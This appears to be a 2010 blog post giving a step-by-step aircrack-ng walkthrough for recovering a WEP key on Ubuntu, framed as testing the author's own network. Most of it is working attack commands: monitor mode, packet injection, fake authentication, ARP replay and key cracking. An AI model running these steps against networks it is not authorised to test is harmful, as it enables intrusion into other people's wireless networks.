Wednesday, March 17, 2010

Use Aircrack-ng to test wireless WEP on ubuntu

i use ubuntu 9.10 and HP dv6000 laptop
the wireless card is
Intel Corporation PRO/Wireless 3945ABG
first install aircrack-ng
sudo apt-get install aircrack-ng
check your card is compatible with aircrack here
mine is already included in kernel 2.6.24 and injection is in kernel 2.6.25 or later
my kernel is 2.6.31 so i dont need to do anything

here is the getting started tutorial

this is what i did to test my network
1- Start the wireless interface in monitor mode on AP channel
sudo airmon-ng start eth1
the output
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
988 avahi-daemon
989 avahi-daemon
1066 NetworkManager
1361 wpa_supplicant
32735 dhclient
Process with PID 32735 (dhclient) is running on interface eth1
Interface Chipset Driver
eth1 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon2)
mon0 Intel 3945ABG iwl3945 - [phy0]
mon1 Intel 3945ABG iwl3945 - [phy0]

2- Test Wireless Device Packet Injection
sudo aireplay-ng -9 -e netwrok_name mon0

3- Start airodump-ng to capture the IVs
in a new shell
sudo airodump-ng -c channel_id --bssid accesspoint_mac -w output mon0

4- Use aireplay-ng to do a fake authentication with the access point
in a new shell
sudo aireplay-ng -1 6000 -o 1 -q 10 -e netwrok_name -a accesspoint_mac -h laptop_mac mon0

5- Start aireplay-ng in ARP request replay mode
in a new shell
sudo aireplay-ng -3 -b accesspoint_mac -h laptop_mac mon0

wait until you got some ARP requests (this may take some time)

6- Run aircrack-ng to obtain the WEP key
in a new shell
sudo aircrack-ng -b accesspoint_mac output*.cap

after some time (depends on the key) you will get the key